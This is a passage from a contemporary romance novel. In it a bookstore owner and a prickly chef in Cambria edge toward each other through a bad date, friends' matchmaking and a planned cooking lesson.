He felt much like a cartoon character in the moment before the pig or frog or whatever turns bright red and flies into the air and steam comes pouring out its ears. This was probably why Neptune's owner had urged him repeatedly to stay in the kitchen where he belonged.
"So, have you got a house here in Cambria?" Zach asked.
"Uh... I live in an apartment above the restaurant, actually. Why do you ask?"
"Zach's a Realtor," Kate added helpfully, the amusement in her eyes telling him that this, right here—this painful exchange—was far and away the best part of her night.
"Here, take my card." Zach thrust a business card toward Jackson. "You know, you really should consider buying. It's been proven time and again that real estate is an excellent investment. Despite the ups and downs, over time, it's the safest place to put your money. Now, Cambria's a pricey area, no question, but there are still some good bargains if you don't mind being a little bit away from the beach. Also, if you don't mind doing a little fixer-upper work—a little DIY, am I right?—then that increases the range of what you can get for your money. You really ought to let me..."
He was still going on when Jackson mentally flailed around for an escape. "Zach, I hate to interrupt, but I have to get back to work. I don't want to let the kitchen staff get backed up."
Zach looked around at the abundance of empty tables. "Not too busy tonight, a weeknight and all, I'd have thought you..."
"Enjoy your meal!" he said, and hurried back to the relative safety of the kitchen without waiting for a response.
_Holy hell._
He went back to work, only partly focused on what he was doing. As he simmered and sautéed and corrected the inevitable errors of his staff, he kept peeking out at the dining room to see what Kate and Gorgeous George were doing. When he caught a glimpse of her heading toward the ladies' room, he handed off what he was doing to an underling, slipped out the door into the dining room, grabbed Kate by the arm, and pulled her into the hallway that led to the restrooms, away from Zach's line of sight.
"Excuse me," Kate said, reclaiming her arm.
"What the hell are you doing with that guy? He's a stiff." Up close and standing beside him, she was even more beautiful tonight than he'd realized. Her eyes were hypnotic. He tried to focus on his line of thought.
"What am I doing? I'm on a date. I'm an adult, single woman. I date."
"Yeah, but _him_?" He noticed her smell, and it threw him off. She smelled of jasmine and warm, clean skin. It almost made his knees weak.
"Is this because of the white zinfandel?" Her lips quirked up into a grin, and he couldn't help it—he had to laugh.
"You did that to me on purpose."
"Well, he did choose the wine on his own, with no prompting. But I maybe did poke at you a little. For fun."
Back to the topic at hand. "Listen, what do you want with that guy? He's a Realtor, for chrissakes."
They gazed at each other, an electricity building between them.
"Yeah?" He almost couldn't find his voice.
"I really do need to visit the ladies' room, if you don't mind."
"What? Oh." He backed off and let her go. When she was gone, he peeked into the dining room, and looked at the guy, this Zach.
# 5
The post-game analysis took place two days later as the four women walked together at Fiscalini Ranch, a nature preserve with paths that meandered along the bluffs above the rugged, crashing surf. Golden, wild grasses swished in the wind amid wildflowers of yellow and purple. Below them, sea lions reclined on rocks, barking and occasionally scuffling with one another. Some tourists wandered the paths here and there, their cameras on straps around their necks, but mostly this area was for the locals. The early morning sky was clear and dazzling, and a light breeze touched their faces as they walked.
None of their shops opened before ten, except Jitters. But Lacy had the late shift today, so after a flurry of phone calls back and forth, the scheduling for their walk was worked out with relative ease.
"So, really no question that he's hung up on his ex, huh?" Gen asked as they climbed a hilly path, squirrels scurrying out of their way.
"Oh, that's been established." Kate arranged her wide-brimmed hat to shield her face from the sun. "The whole last half of the date was him pining over her. Really, I felt bad for the guy. I mean, breakups are hard. I know that as well as anybody. He's trying to get out there and move on, but... he's not ready. Even he knows he's not ready."
"Well, that sucks." Lacy, in yoga pants, a tank top, and a baseball cap, looked at Kate in sympathy.
"It's fine. From my end, anyway, it's fine," Kate assured her. "This was just practice, remember? It was never going to work. He wasn't right for me."
"At least you got a good meal at Neptune, though, right?" Rose tried to inject some optimism into the discussion.
"I did."
"What did you have?"
"Sea bass."
"Mmm." Rose made appreciative noises that one usually heard only during sex. "That's one of my favorites." After a moment, she added, "Jackson says he saw you there."
Rose and Jackson were friends, partly because he ordered wines for the restaurant from De-Vine, so the two consulted regularly. Over time, Rose had grown fond of the prickly chef, finding that his frequent fits of pique came mostly from a desire for excellence. She could admire that.
Kate giggled, remembering the evening. "Oh, he saw us, all right. I'm sure he mentioned the white zinfandel."
"Ugh, white zinfandel?" Gen wrinkled her pale, freckled nose. "Even I know that's a no-go, especially to him."
"Zach ordered it. Jackson saw the wine and I could see that he wanted to throw a fit. It was all he could do to contain himself. I might have poked at him a little bit."
"He said you poked." Rose shook her head with a wry smile. "Brave woman."
"But that wasn't the funny part," Kate said. "Well, yes, it was the funny part, in terms of amusing funny. But it wasn't the strange part."
"What was the strange part?" Lacy asked. Kate assumed Lacy was looking at her with interest, though it was hard to tell with Lacy's enormous sunglasses.
"Here, let's take a break," Kate suggested. They stopped at a bench crafted from driftwood that was positioned above a breathtaking view of the surf. They sat, and she continued. "The strange part was that Jackson pulled me aside when I was on my way to the bathroom, and he seemed really worked up. Even for Jackson."
"About the wine?" Rose asked.
"No. About Zach. He went all alpha male on me. 'What are you doing with that guy?' 'That guy's a stiff.' 'Why are you dating him?' I mean, it's not like it's any of his business. Yes, it's true that Zach did try to sell him real estate. But still."
Rose looked thoughtful. "Hmm."
" 'Hmm' what?" Kate demanded.
"Just hmm."
"I think what Rose is trying to say," Lacy broke in, "is, have you thought about Jackson?"
"What do you mean, have I thought about Jackson? Of course I've thought about him. I'm thinking about him right now. We're talking about him."
Rose raised one eyebrow. "No. I mean, have you _thought_ about him?"
"Huh." Gen appeared to be in deep thought. "Now, that could be interesting."
"What are you two talking about?" Kate demanded.
Lacy said, "You have to admit, Kate, it sounds like he's interested in you. Why else would he have cared that you were dating a guy who looks like... well, like Zach? When guys ask, 'Why are you with him?' what they really mean is, 'Why aren't you with me?' "
"Yeah." Gen nodded. "They do."
Kate felt a little jolt in the center of her chest at the idea that Jackson Graham might possibly be attracted to her. She shrugged in a way that was supposed to be casual. "Oh, come on. He's never been anything but... irritable when he's around me. That's the word," she decided. "Irritable. Last time I talked to him before Neptune, he called me an idiot."
Rose shook her head. "No, that's not how I remember it at all."
"What do you mean?" Kate said.
"The way I remember it, he _accidentally_ called you an idiot, and then when he realized what he'd done, he looked like he'd swallowed his tongue."
"Oh, that's interesting," Lacy interjected.
"No," Kate said. "It's not interesting. I mean, yes, he's somewhat attractive, if you like broad shoulders and thick, wavy hair, and... and raw male magnetism. But he's slept with pretty much everybody in Cambria. I mean, the man has a reputation. I don't know if I want to deal with that."
"At least he hasn't slept with any of us," Lacy said.
Rose looked uncomfortable. "Well..."
"Oh, no," Kate said. "You had sex with Jackson?"
"No," Rose said. "No, no. But there was some making out. And there might have been some groping. Okay, a lot of groping."
"Well, then I definitely can't go there," Kate said.
"Sure you can," Rose reassured her. "Look, it was nothing. We fooled around a little, then we decided we were better as friends. I don't have any lingering feelings, or resentment, or anything like that. We're good."
"Really?" Kate realized that she'd felt an ugly surge of jealousy at the thought that Jackson had been with her friend. Rose's explanation made her feel a bit better.
"Really," Rose said.
"You and Jackson," Gen mused. "Wow. I hadn't thought of that, but... yeah. Wow."
Kate waved her hands around in front of her. "There is no 'me and Jackson.' There is no 'wow.' "
"Well." Rose sounded thoughtful. "There could be a wow."
Jackson and Daniel were playing basketball at Shamel Park, an expanse of lawn, playground equipment, a few sports fields, and a public pool adjacent to the beach. They'd called two friends to make it more interesting than one-on-one: Ryan Delaney, whose cattle ranch provided grass-fed beef for Neptune, was on Jackson's team, and Will Bachman, caretaker for a mansion just up the coast, was on Daniel's.
Jackson and Ryan had lost the coin toss for who'd keep their shirts on, so now their bare torsos glistened with sweat as they played. This displayed Ryan to a certain advantage, since his tanned, fit physique was drawing appreciative glances from women at the park. Jackson, on the other hand, wished he could just put his damned T-shirt back on. With his fair coloring and the fact that he was at the restaurant almost every waking hour, his skin was so pale it practically glowed. He'd had to slather himself with 50 SPF before even thinking about starting the game. To add to the hilarity, the other guys had taken to calling him "Casper." At least he hadn't let himself go like a lot of chefs did, being around food all the time. He usually made it to the gym, and he constantly reminded himself—with some success—that his job was to cook it, not to eat it. So he'd have looked pretty good if he hadn't been so goddamned _white._
Like he could give a shit what the girls at the park thought of him, anyway. He wished he did. But despite all his best efforts, the only woman whose opinion he cared about was dating a Realtor-slash-supermodel. The thought of that made him want to bash somebody's head in. Preferably, the Realtor supermodel's. But since he couldn't do that, he played with unusual ferocity instead. This didn't escape the notice of Daniel and Will, who'd been shoved, elbowed, and generally abused during the course of the game and were starting to feel a little put out about it.
"Hey, Casper, take it easy. This isn't the NBA," Will said after taking a forearm to the face.
Jackson, breathing heavily, wiped the sweat from his face. "Sorry." And he was. He wasn't roughing people up on purpose. He was just... getting in there a little bit more than usual. And, hell, it was working. At the end of the game, they were up six points, mostly because of Ryan, who'd played varsity basketball in high school.
"What's got you all worked up?" Daniel asked after the game ended and they were toweling off and drinking deeply from bottles of water. The four of them walked toward some nearby benches, still breathing heavily.
"Nothing," Jackson insisted.
"Bullshit," Ryan said. "After that last foul, I thought we were gonna have to call 911 for Daniel."
Jackson threw his towel onto the bench. "Ah, shit."
"So, what is it?"
He peered at the others, hesitated, and then decided he had to talk to someone. "She came into Neptune a couple nights ago with a guy. This..." He gestured vaguely. "This _guy_ who sells real estate and orders crap wine and looks like this goddamned Adonis. I guess it's been bothering me."
"We're talking about Kate," Daniel said.
Jackson was annoyed. "Of _course_ we're goddamned talking about Kate. I'll tell you what. I've got to get past this... this _thing_ I have for her. I oughta find somebody new to go out with. Have some fun. Get my mind off her."
Ryan shook his head. "You asshole."
Jackson blinked at him, surprised. "What? Why am I an asshole?"
"Because it's never once occurred to you that one way to deal with the feelings you have for her is to go out with _her_."
"Ah, that's just... "
"True," Daniel interjected. "That's what it is."
Jackson ran a hand irritably through his hair. "Yeah. I guess it is."
"Look. I get it," Daniel went on. "At least, I think I do. Your last few relationships haven't worked out... "
"That's an understatement."
"... So you've stopped trying. Especially when it's someone who matters to you."
They sat on a bench drinking water and cooling down, watching some moms pushing their toddlers on the swings.
"If it's just somebody to date—some pretty face—then it doesn't matter if she gets tired of your bad moods and your diatribes and moves on sooner rather than later. But when it's Kate... " Daniel left the thought dangling in the air.
"Thank you, Dr. Freud," Jackson said wryly.
"Just ask her out," Will insisted. "Stop being a wuss."
They were silent for a moment while Jackson pulled his shirt back on. He leaned forward, elbows on his knees, avoiding Daniel's gaze.
"Let's say I want to," he said finally.
"Okay, let's say that," Daniel said.
"Why the hell would she ever say yes? Every time she sees me I'm yelling at her or calling her an idiot."
"Yeah, you might want to stop doing that," Ryan said.
Some kids with a big, red rubber ball accidentally kicked it toward the bench. Daniel scooped it up and tossed it back to the kids, who ran off to resume their game.
"You know what you need?" Daniel said after a while.
"Yes," Jackson answered. "But no one's invented personality transplants yet."
"Very funny. Seriously. You need an icebreaker."
Jackson looked at Daniel. "An icebreaker?"
"Yeah. He's right," Ryan said. "You need to be around her in some sort of casual setting, without yelling at her or calling her an idiot. Act like a guy with manners for a change. Let her see the other side of you."
Jackson scoffed. "I don't know if I have another side. And anyway, what makes you guys experts? Last time I checked, Ryan, you hadn't done even one thing to get closer to Lacy. Besides making moony eyes at her, and that doesn't count."
Lacy, who'd lived in Cambria her entire life with her parents and her extended family right there in town, was tall, blond, blue-eyed, and gorgeous. The fact that she was more comfortable in a pair of frayed, faded jeans and a T-shirt than she was in a little black dress made her all the more attractive to Ryan, who was used to life on a cattle ranch, where expensive clothes just seemed frivolous and stupid. He was crazy about her.
The muscles in Ryan's jaw bunched up. "Let's not talk about Lacy."
"Why not?"
"Because we're talking about you."
The conversation was getting entirely too touchy-feely for Jackson, but on the other hand, his friends were right—he had to do something if he was ever going to get anywhere with Kate. It wasn't going to happen on its own.
"So, this 'icebreaker' idea."
"Yeah?" Daniel said.
"How would it work? What would I do? What's the plan, geniuses?"
Daniel grinned and nudged Jackson with his shoulder. "Give me a day or two to think about it."
# 6
Kate got off the phone with Zach and sighed. She was sitting in her pajamas, cross-legged on her sofa with a glass of wine (not white zinfandel) on the table beside her. She and Zach had decided that dating wasn't right for them—they'd never make a good couple—but once he'd started talking to her about his ex-wife, Sherry, he'd found it difficult to stop. He'd been calling her almost nightly to talk about his heartbreak, and to ask for Kate's advice.
She really did feel bad for the guy. It seemed that his problems with Sherry came down to issues with communication, priorities, and timing. She wanted children. He wanted them, but not yet. He wanted to build his career and put together a nest egg for the family they'd eventually have. She wanted him to spend less time working and more time at home. She wanted to go back to school and get the college degree she'd missed out on the first time around. He thought the reason she wanted it was because she didn't trust him to provide for her. He used his looks to advantage in his work, flirting with female clients to get a listing or make a sale. And Sherry was a jealous woman who didn't appreciate that particular strategy.
To Kate, it seemed like the problems were not insurmountable, especially knowing how much Zach wanted to win Sherry back. If they would only take some time to talk about things. To be together without distractions and discuss what they both wanted out of the relationship.
Suddenly, Kate had an idea—a crazy matchmaking idea. In general, she didn't believe in people getting involved in other people's love lives. But on the other hand, she also didn't want to be Zach's over-the-phone therapy buddy for the rest of her life. She felt bad for him and she wanted to help him, but his calls were seriously cutting into time she could have spent eating Ben & Jerry's and watching Netflix.
Inspired, she went out the front door, made a right, hurried down the stairs, and pounded on Gen's door.
"What? I'm coming! Hold on!" Gen called from inside the apartment.
When the door opened, Gen looked at her with squinty eyes.
"What's going on? Is the house on fire?"
Kate pushed her way into the tiny kitchenette, then on into the bedroom-slash-sitting room. Right now, it was set up as a bedroom, with the pull-out sofa made up into a queen-size bed with springs and bars that poked the crap out of your back whenever you slept on it. For some reason, Gen didn't seem to mind the arrangement.
"I just need your opinion on something," Kate said, plopping onto the bed.
"Okay, shoot."
Gen looked bleary-eyed. Maybe she'd been sleeping. _Already?_ Kate glanced at the clock on the mantel and was surprised to find that it was past eleven o'clock.
"I have to get Zach back together with his ex."
"No, but soon. The sooner the better."
"And you need my opinion on that?" Gen wandered into the kitchen, got a glass of water, and brought it into the bedroom.
"Not exactly. I need your opinion on how I'm going to do it."
"Oh. Okay. Just let me... " She rubbed at her face vigorously, took a deep breath, and opened her eyes wide. A waking-up ritual. "All right. Ready." She plopped down on the bed next to Kate.
"What if I set up a romantic evening for them?" She held up her hands to forestall the objection she thought was coming. "Just wait. Listen. What if I had him invite her to my place for an evening? I won't be there, of course. Obviously. But we could set up dinner on the deck at sunset, with music and some great food. Candlelight. Nice table linens. The whole deal. They can even stay the night. I'll set up the bedroom with rose petals and champagne and... and... okay, I really don't want to think about them having sex in my bed, but I have to get him to stop these hours-long phone conversations where he tells me how miserable he is. So? What do you think?"
Gen scrunched up her nose in thought. "Whose house will she think it is?"
"Oh, good question."
They both thought about that.
"He could say he's selling it."
"Oh! He could say he's renting it!" Kate waved her hands excitedly. "That's plausible, right? There are a ton of vacation rentals around here."
Gen shook her head. "How's he going to explain all of your stuff? Unless you want to move out everything but the furniture for a weekend."
"Oh. Jeez. No, that won't work." Kate's eyebrows shot up. "He could say he's housesitting."
Gen nodded. "Yeah, maybe. That could work. Would she agree to it? I mean, she's his ex for a reason, right?"
"Yeah, but from what he says, the whole 'ex' thing isn't a hundred percent. They talk. They're friendly. He could probably make it happen."
They sat together on the bed, Gen sipping her water, Kate splayed out across a pile of pillows. "Jeez," Kate said. "This bed is like torture. You're being tortured. Why do you sleep on this thing?"
Gen looked at her wryly. "In case you haven't noticed, this apartment is about the size of a broom closet. There's no room for both a sofa _and_ a bed."
"Well, there's that. But at least you have a great landlady."
"I don't know." Zach sounded skeptical over the phone as Kate laid out her plan for him. "We're divorced. She divorced me. Now I'm supposed to ask her for a date?"
"Not just a date!" Kate, standing behind the counter at Swept Away, considered the best way to make her case. "It's... it's a grand gesture! You haven't seen my place, but it's got the best view in Cambria, I swear to you. Breaking waves. Barking sea lions. Gulls soaring overhead. I've even got deer on the lawn. Sometimes. I can't promise the deer, they kind of come and go at will."
"And so this would be dinner, and... "
Clearly, she was going to have to give him the vision from her own imagination, since he had none of his own. "Dinner at sunset, overlooking the ocean. With candlelight, wine, soft music. Rose petals in the bedroom, chilled champagne, more candlelight. And, you know, you're going to have to take it from there, because I'm not describing the rest."
"And where will you be?"
"Somewhere else, obviously." She rolled her eyes.
"I'm supposed to make dinner for her? I don't cook."
"I'll cook!" Kate didn't cook either, but he didn't have to know that. She could work that part out later. "But, listen. If you really want her back, you're going to have to decide up front what you're willing to give her."
"Give her? You mean, like a gift?"
"I mean, like the things she wanted out of the relationship that you said no to. The stuff that broke you up in the first place. What does she really want that you're willing to give her to make this work?"
He was silent.
"What about kids? She wants kids, right? And you said you wanted to wait. Well, what are you waiting for? Tell her you're willing to start trying. Is that something you'd do to get her back?"
"Yeah. We could do that," he said, his voice a little more confident now.
Kate had two customers browsing through the store—middle-aged tourists, the guy in cargo shorts and a Cambria baseball cap, and the woman in a flowing sundress and sandals. Kate knew she needed to help them—needed to get back to work—but she felt like Knute Rockne giving an inspirational speech at halftime. She couldn't stop now, before the deal was sealed.
"That's great, Zach. Tell her you're willing to start a family now, and... and tell her you'll work shorter hours and spend more time with her."
"Well, now, I don't know... "
"Okay, if not that, then tell her she can go to college."
"Oh, come on, Zach. She doesn't want to go as some kind of plan B, because she doesn't trust you as a provider. She wants to go because... because she's stagnating at home. She wants to use her mind! She wants to prove something to herself, that she's smart, that she's capable. She wants to grow as a person! For God's sake, let her grow!"
He hesitated for a moment longer.
"Zach. Jeez. You're miserable without her. What's a little college if it will bring her back home?"
"But what about the kids? If we have kids, when is she going to go to college? She'll be busy with all these new kids we'll have."
Kate blew out some air, frustrated. "She'll figure it out. Just tell her you trust her judgment. And then you've got to actually do that. You've got to actually trust her judgment."
"You'll do it?"
She did a silent fist-pump, which caused the tourists to look up in amusement. She put a hand over the phone and mouthed, "I'm so sorry. I'll be right with you."
She returned her attention to Zach. "So, ask her, figure out what night you want to do it, and let me know. I've gotta go. I'm ignoring my customers."
"Okay. Kate? You're the best. Really. Thank you. I don't even know why you're doing this."
She knew. It was because she couldn't take any more of his sad-sack, endless phone calls with him whining like a lovesick puppy. But she didn't tell him that.
"It's no problem, I'm happy to do it. Now ask her. Bye."
She ended the call and turned to her customers. "Thank you for your patience."
"He'll never regret having kids," the woman said. "We have three kids and five grandkids. Here. I have pictures."
Zach got back to her a day later, giving her a date for his romantic evening with Sherry. He seemed surprised that she'd said yes, but Kate wasn't. Things clearly weren't finished between these two, and sometimes a woman needed to be swept off her feet by a guy who'd taken the time to make special plans. Sherry didn't have to know that Kate was the one who'd made the plans.
With that done, she had to deal with the fact that she'd said she would cook. Kate's idea of cooking usually involved two slices of bread and some lunch meat, or maybe putting a Pop-Tart in the toaster. She called Neptune to see if they would cater the dinner, but was disappointed to learn they were booked up weeks in advance.
She thought about whether any of her friends could cook. Gen was a good baker, but Kate wasn't at all sure how she'd do with actual dinner food. Rose _knew_ food—as in what went well with what—but she rarely made any herself. That left Lacy. She was clearly the best cook of the four of them. She sometimes even marinated things.
During a slow period at the store, Kate called Lacy at Jitters and explained the situation. Lovelorn couple, special evening, nobody to cook the dinner that would prove to be the key to Sherry's heart.
"Oh, wow." Lacy seemed impressed with Kate's plans. "You put all that together? For a guy you went out with and then rejected? I've never been that nice to my bad dates."
"It's not as selfless as it sounds. His 'I can't live without Sherry' phone calls are getting old, especially when I could be rewatching _Breaking Bad_. So, how about it? Can you cook a meal to get these two crazy kids back together? Zach will pay for the food."
"Maybe. What night is it?"
"This Friday?"
"This Friday."
"As in, five nights from now?"
"Yeah. As in, Friday. The day after Thursday. Can you do it?"
The silence on the line didn't bode well.
"I wish I could," she said finally, her voice full of don't-want-to-let-down-a-friend misery. "I've got a family thing that night. My grandparents' golden wedding anniversary. I'm really sorry."
Kate sighed. "Listen, don't worry about it. I'll figure something out. Even if I have to order pizza and serve it by candlelight."
Daniel was at the gallery talking with Gen about some new pieces he was working on when Kate called to update Gen on her plans for the dinner. Daniel's ears pricked up when he heard Gen talking about Kate and Zach.
"What's this about a fancy dinner?" he asked after she hung up the phone. "I like fancy dinner."
"It's for a friend of Kate." She blew a red curl out of her eye in a gesture of frustration. "She's trying to get him back together with his ex. She set up a romantic dinner for them, but... no food. Neptune's booked."
"Hmm. Is this the guy she went out with that one time? The guy she had dinner with at Neptune?"
"Yeah. How do you know about that?"
"Word gets around," he said. "So, what's the plan?"
She looked at him curiously. "Why do you want to know?"
"I just do."
"But why?"
He shrugged. "Just think of it as gossip. Think of me as one of your girlfriends."
"Okay. Can we paint our nails after?"
He flashed her a grin, and she told him the plan.
"Listen. This is perfect. You do her a favor, show her what a good guy you are. She'll owe you one. She pays you back by taking you out to the movies or something. All you have to do is not act like an ass. You think you can manage that?"
"Hmm. Maybe."
Daniel was standing in the dining room at Neptune, an hour before the restaurant opened for lunch. He'd hurried down Main Street to the restaurant after his talk with Gen and banged on the door, saying he needed to talk with Jackson. The chef was rushing around, supervising prep, dealing with whatever chefs dealt with before the doors opened. He'd stopped his work, interested, when he'd heard what Daniel had to say.
"Come on," Daniel urged. "You don't want to miss a chance to be a big hero."
Jackson sighed. "Well, if it's going to get that Zach asshole back with his ex and away from Kate, that's a plus."
"It is," Daniel agreed. "Should I tell Gen to tell Kate you'll do it? I can pass her a note after fifth period."
Jackson scowled at him. "When's the dinner?"
"Friday night."
"Aw, Jeez. You know I can't on a Friday. It's our busiest night."
"Right." Daniel gave it some thought. "Can you make it ahead and have her freeze it and reheat it or something?"
Jackson looked at Daniel as though he'd taken leave of his senses. "Freeze my food? Are you serious?"
Daniel put up his hands in a gesture of surrender. "Sorry, sorry. I should have known better."
"Yeah, you should have. Look, it was a pretty good idea, but... "
"Teach her to make it!" Daniel had the look of someone who'd been struck by inspiration. "Yeah, that's it. Teach her to cook something for them. You'll be working closely together in the kitchen, tasting, stirring. Maybe even sautéing. Your hands brush together over the chicken cutlets."
"What are you, a girl?"
Daniel's brow furrowed. "That's the second time today someone has suggested that."
"Well, if the Prada pump fits... "
"But seriously. You can see the possibilities."
"Maybe," he said again.
"Screw maybe," Daniel said as he headed for the door. "I'll tell her you'll do it. When's your night off?"
"Great. Tuesday!" Daniel rushed out the door before Jackson could change his mind.
"Wait. _Jackson_ is going to teach _me_ to cook something for Zach and Sherry?" Kate was in the shop, and Gen had just walked down from the gallery and popped her head in the door to tell her the news.
"Right. On Tuesday night after you close the shop. It's all set."
"But what... " She closed her eyes and waved her hands around in front of her. "There are so many things wrong with this picture. First, why would Jackson Graham, the top chef in Cambria, want to bother with Zach and Sherry's dinner? And second, if he _does_ want to do it, why would he be teaching _me_ to do it instead of just doing it himself?"
"Because it's on Friday night."
"Ah. And he has to work on Friday night, obviously. Duh."
Kate looked at Gen, her head tilted like a dog who heard something strange. "But why does he want to do it in the first place? Am I paying him a bundle of money I don't have?"
"Nope. He's volunteering."
"But why?"
Poised in the doorway, Gen looked at her with sympathy. "Honey, I love you, but you really can be dense sometimes."
Kate stared at her. "What are you talking about?"
Gen changed her posture and her facial expressions, and started doing her best Jackson Graham impression. " 'Kate, what are you doing with that guy? He's a stiff! White zinfandel? My God!' " Then she became Gen again. "He's too big of a wuss to ask you out on a date, so he's going to teach you to cook instead, because he gets to spend time with you, and, hopefully, he also gets Zach out of the picture by getting him back together with his ex. Jeez. I shouldn't have to draw you a picture."
Kate started to say something, then stopped. She cocked one hand on her hip. "Oh. Really?"
"Yes. I'll tell Daniel to tell Jackson you'll do it. Tuesday night, your house. He'll bring the food." She started to leave, then hesitated. "And wear something pretty. But not something that looks like you're trying too hard. I mean, it's a date, but it's not a date. It's a cooking lesson that's also... Oh, never mind. I'll pick something out for you. Gotta go." She sped off, leaving Kate and Althea looking after her questioningly.
"What in the world was that all about?" Althea asked, a stack of new releases in her hand.
Kate shrugged. "I guess I'll find out Tuesday."
# 7
The shop closed at six on Tuesday, and Jackson had sent word—through Daniel and then through Gen—that he'd be at Kate's place at seven. That left little time for Kate to rush home, change into the outfit Gen had picked out for her—a blue cotton sundress and low, strappy sandals—touch up her makeup, and clean up the house so it would look presentable.
Obviously, the kitchen took top priority, cleaning-wise; Jackson would probably turn around and leave, scowling, if it wasn't spotless. Fortunately, that didn't take much, since Kate rarely used the kitchen for anything but toast and frozen pizza.
With the counters wiped down and the sink scoured, she rushed around picking up various pieces of her life from the countertops, the tables, the sofa. Magazines, books, used water glasses. She scooped up a pile of discarded clothes from the bedroom floor, considered putting them away, looked at the clock, and opted instead to stuff them inside the closet and close the door. When she was finished, she gave the place an appraising look. Not bad.
As she worked, she thought about exactly what it was she was hoping to gain from spending time with Jackson. Like Zach, he wasn't relationship material. He didn't use women, exactly—those who had dated him tended to think well of him even after things ended. But end they did, and usually after a very brief time. But who was to say that wasn't just what Kate needed? She was getting back into dating for the first time in years. She wasn't ready to jump into anything serious. A brief and mutually satisfying fling with a man who revved her engine could be exactly the right thing for her at this point in her life. There was no harm in it. They would both have fun, and then they would part on good terms.
At six forty-five, Gen came in to give Kate and the place her assessment. She looked Kate up and down, then gave her a thumbs-up. "Good. You look good. Really pretty, but also casual. Just hanging around, being yourself, living your life, not at all concerned that a really hot guy is about to knock on your door."
Kate gave her a half-grin. "That's just the look I was aiming for."
Gen, looking serious, appraised the house. "Okay, wait." She went to Kate's bookcase, plucked a couple of books from the shelves, and arranged them artfully on a side table. Then, reconsidering, she selected one, opened it to the middle, and placed it pages-down on the arm of the sofa. "There."
"What's that for?"
" _The Unbearable Lightness of Being_. Sexy and intellectual. You're all set."
Gen wished Kate luck and went out the door.
Kate could hear Gen's footsteps going down the stairs to her apartment, and part of Kate wanted to go hide down there, too. What was she doing? Yes, a fun fling might be nice. But Jackson Graham had rarely been anything but foul-tempered and rude to her. Why should she think that he was attracted to her, just because someone told someone else that he was interested?
_Just relax, and forget all of that. He's doing me a favor. He's coming because I promised Zach a romantic dinner with Sherry, and I don't know how to cook._
Fine. She'd stick to that. This was a guy just helping someone out. Something he'd have been unlikely to do if he weren't interested in her. But still.
She looked at the clock. Five minutes to seven. She felt a little fluttery feeling in her chest, and took a deep breath to steady herself. Okay, so maybe the very sight of him made her stupid and sweaty-palmed. Maybe it always had. So what? There was no reason to act like this was anything more than a cooking lesson.
After all, it would be foolish to get her hopes up about anything that had to do with a man. She'd learned that the hard way.
Kate hated to be a cliché, but she knew she was one. Burned by a man two years before—having been cheated on, emotionally manipulated, belittled, and used—she'd been left so emotionally fragile that she hadn't ventured out there since then. Gen, Rose, and Lacy had tried to fix her up numerous times, but she just hadn't been ready for that. Was she ready for it now?
_Only one way to find out._
She poured herself a glass of chardonnay to steady her nerves. She was only two sips into the glass when Jackson arrived. She opened the door to find him virtually hidden under bags of groceries and kitchen supplies.
"Wow! Let me help you with that," she said, taking a bag from his arms and ushering him in.
"Thanks. I didn't know what you had, so I thought I'd better bring a few things."
They put the bags down in the kitchen and she peered inside: one contained the food they'd be preparing, and another, a thick canvas carry-all, contained a sauté pan, a sauce pot, a set of knives in a leather sheath, and other various implements Kate couldn't name.
"I have a few things, but... mostly I don't cook," she said.
"I was afraid of that."
"That's why I was so desperate for help. Thank you, by the way. I appreciate you coming to my rescue like this." She looked up at him. Instead of replying, he'd stuffed his hands into his pockets, looking uncomfortable. She couldn't help but smile at his awkwardness. Who'd have thought he would be awkward, given his vast and varied experience with women?
There was that fluttery feeling again. Something about the guy. At six-foot-two, with broad shoulders and a powerful build, he towered over her. His wavy, ginger hair was attractively unkempt. He wore close-fitting jeans and a deep emerald button-down shirt that made his green eyes all the more dazzling.
"Should we get started?" she prompted.
"First, let's go over the... Wow." He stopped midsentence as his gaze wandered over the sliding glass doors that led to the deck and the breathtaking view beyond. He walked across the room, opened the door onto the deck, and stepped out. "From the neighborhood, I figured you had a view. But this... "
He took in the breaking waves, the sounds of the sea lions, the grassy expanse on the slope below the house, the hummingbirds flitting to and from a tree just off the railing of the deck.
"It was my mother's." She came out onto the deck to stand beside him.
"The house?"
"Yes. She left it to me when she passed away five years ago. The bookstore, too. When she died, I figured I'd sell both of them and get back to my life. But then... this became my life. I couldn't bring myself to leave." Standing close to him, she could smell a hint of his cologne on the early evening breeze.
"Any regrets?" he asked.
"Actually, yes. I regret that I didn't spend more time here, with her, before she passed. I was too busy. Busy, busy, busy." She shook her head at the thought.
He turned toward her, leaning one hip on the railing of the deck. "What did you do before this? What kept you so busy?"
"Oh," she waved a hand dismissively. "It all seemed so important at the time. I went to grad school. I wrote a book. I had an adjunct teaching job at a university. I was very involved in being an intellectual. Going to cocktail parties to be seen with the right people. That sort of thing."
His eyebrows rose. "You wrote a book?"
"I did."
"Published, or in a drawer somewhere?"
"Come inside. I'll show you."
They went into the house, and she rummaged around in a bookcase. "Now, where did it... " She looked over at the books Gen had stacked on the side table. "Oh. Of course." Naturally, Gen had put the book out where it would be visible. Kate walked to the side table and took the book from the stack. "Here."
She handed the book to Jackson.
He looked at it—a trade paperback with the simple, elegant image of a tree in fall foliage on its cover—and then looked at Kate, surprise on his face. "This is you? You wrote _Beyond the Boundaries of Desire_? You're Katherine Hoffman?"
"It's my married name. Before I changed it back. You've read it?" Kate felt an electric jolt of pleasure at the thought that he knew and had enjoyed her work.
"Years ago, when it came out." He opened the cover and looked at a handwritten inscription on the title page.
_To Mom,_
_I couldn't have done this without your love and support._
_All my love, Kate._
"This is your mom's copy."
Kate reached out for the book and held it in both of her hands, tears welling up in her eyes. "Yeah." She swiped at her eyes. "Sorry. She's been gone five years, and it's still hard."
"Of course it is."
They looked at each other with charged intensity before she changed the subject. "So, what did you think of the book?"
"Are you kidding? It was brilliant."
She wondered if maybe he was bluffing—either hadn't read it, or had read it and forgotten about it—when he quoted from the last chapter:
" _And then Wallace understood what she'd meant when she'd said she couldn't live, couldn't breathe. It was a saddening of the soul, a heartache unthinkable in any other place_."
Kate looked at him, and then at the book. "Well, I... Wow."
"That's what I was going to say about the book. Wow. I couldn't get over the ending, where the kid walks into the river. I almost wrote to you about it."
"You did?"
"Almost. But then I figured a big-time writer like Katherine Hoffman wouldn't want to be bothered by a guy like me." There was that awkwardness, that vulnerability, again. It made her smile.
She turned away from him to hide her mounting emotions. "Are you kidding? I'd have loved it. You were one of about fifty people who read it."
"That's not true. You got reviewed in the _New York Times_."
"You read the _Times_ review?"
"Sure. The guy raved about it. Called it a promising debut."
"Well." She shook her head. "That doesn't always translate into sales."
